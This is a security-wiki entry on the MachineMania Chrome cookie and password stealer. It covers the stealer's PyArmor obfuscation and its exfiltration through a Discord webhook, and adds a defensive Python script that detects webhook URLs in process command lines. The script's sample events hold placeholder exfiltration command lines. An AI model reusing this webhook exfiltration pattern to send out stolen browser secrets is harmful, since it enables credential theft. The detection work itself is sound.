MachineMania

From Discord Security Advisory
Revision as of 00:13, 4 October 2021 by 148.255.226.56 (talk) (→‎Distributions: Removed wikitable for webhooks (if we start logging these, there'll be too many))

MachineMania (distributed as MachineMania.exe) is a payload that steals cookies and saved password combinations from the Google Chrome browser. While it has been seen distributed as a standalone executable, it is most often found as a second-stage payload[1] of the Node Bootstrapper malware.

MachineMania.exe
Language: Python
Obfuscation: PyArmor (Super Mode)
Behavior: Browser secrets
Lasting Effects: None observed
Send Method: Discord Webhook (through run argument)

Appearances

Distributions

MachineMania.exe has been distributed as a standalone executable, but it has also been invoked as an additional payload by distributions of the Node Bootstrapper executable.

Internals

Obfuscation

The executable is made with PyInstaller and obfuscated with PyArmor in Super Mode.

Behavior

MachineMania.exe runs silently in the background and collects saved passwords and cookies from the Google Chrome browser only. Other Chromium-based browsers do not appear to be affected: its scope is deliberately limited by what appears to be a paywall.

[Image: MachineMania.exe webhook message. The message sent to the malware operator via a Discord webhook.]
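Because the operator's Discord webhook is handed to MachineMania.exe as a run argument, the process command line is a practical place to look for it. The script below is an added example for this page, not code from the wiki or from the malware: it scans constructed process-creation events for a Discord webhook URL in the command line and reports the webhook ID with the token redacted. The event field names, the sample image paths and the webhook IDs and tokens are all made-up assumptions; only the URL shape (`discord.com/api/webhooks/<id>/<token>`) is the real Discord format.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Discord webhook URL shape: https://discord.com/api/webhooks/<numeric id>/<token>
# (discordapp.com and the ptb./canary. subdomains are accepted as well).
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/webhooks/"
    r"(\d{5,})/([A-Za-z0-9_-]{20,})",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed field names, not a real log schema)."""
    image: str
    command_line: str


def redact_token(token: str) -> str:
    """Keep only a short prefix so analysts can correlate without exposing the token."""
    return f"{token[:4]}...({len(token)} chars)"


def find_webhooks(text: str) -> List[Dict[str, str]]:
    """Return every Discord webhook found in a string, with the token redacted."""
    return [
        {"webhook_id": m.group(1), "token_redacted": redact_token(m.group(2))}
        for m in WEBHOOK_RE.finditer(text)
    ]


def scan_events(events: List[ProcessEvent]) -> List[Dict[str, str]]:
    """Flag processes whose command line carries a Discord webhook URL."""
    findings = []
    for ev in events:
        for hit in find_webhooks(ev.command_line):
            findings.append({
                "image": ev.image,
                "webhook_id": hit["webhook_id"],
                "token_redacted": hit["token_redacted"],
                "reason": "Discord webhook URL passed as a process argument",
            })
    return findings


# Constructed sample events; the paths, IDs and tokens below are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Users\victim\Downloads\MachineMania.exe",
        command_line="MachineMania.exe https://discord.com/api/webhooks/"
                     "111111111111111111/PLACEHOLDER-TOKEN-abcdefghijklmnop",
    ),
    ProcessEvent(
        image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        command_line='"chrome.exe" --type=renderer --lang=en-US',
    ),
    ProcessEvent(
        image=r"C:\Users\victim\AppData\Local\Temp\python.exe",
        command_line="python.exe send.py https://discordapp.com/api/webhooks/"
                     "222222222222222222/PLACEHOLDER_TOKEN_qrstuvwxyz0123456789",
    ),
    ProcessEvent(
        # Ordinary API traffic to discord.com is not a webhook and must not match.
        image=r"C:\Windows\System32\curl.exe",
        command_line="curl.exe https://discord.com/api/v9/users/@me",
    ),
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The regex requires the `/api/webhooks/<id>/<token>` path, so generic Discord API traffic (the `curl.exe` event) is left alone, and tokens never reach the report in full. In practice the same check would be run over the command-line field of endpoint telemetry rather than over a hard-coded list.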

Lasting Effects

MachineMania has not been observed to leave any lasting effects such as keyloggers or embedded JavaScript. After it has sent the stolen data, it simply closes itself. If it cannot find Chrome, it crashes.

References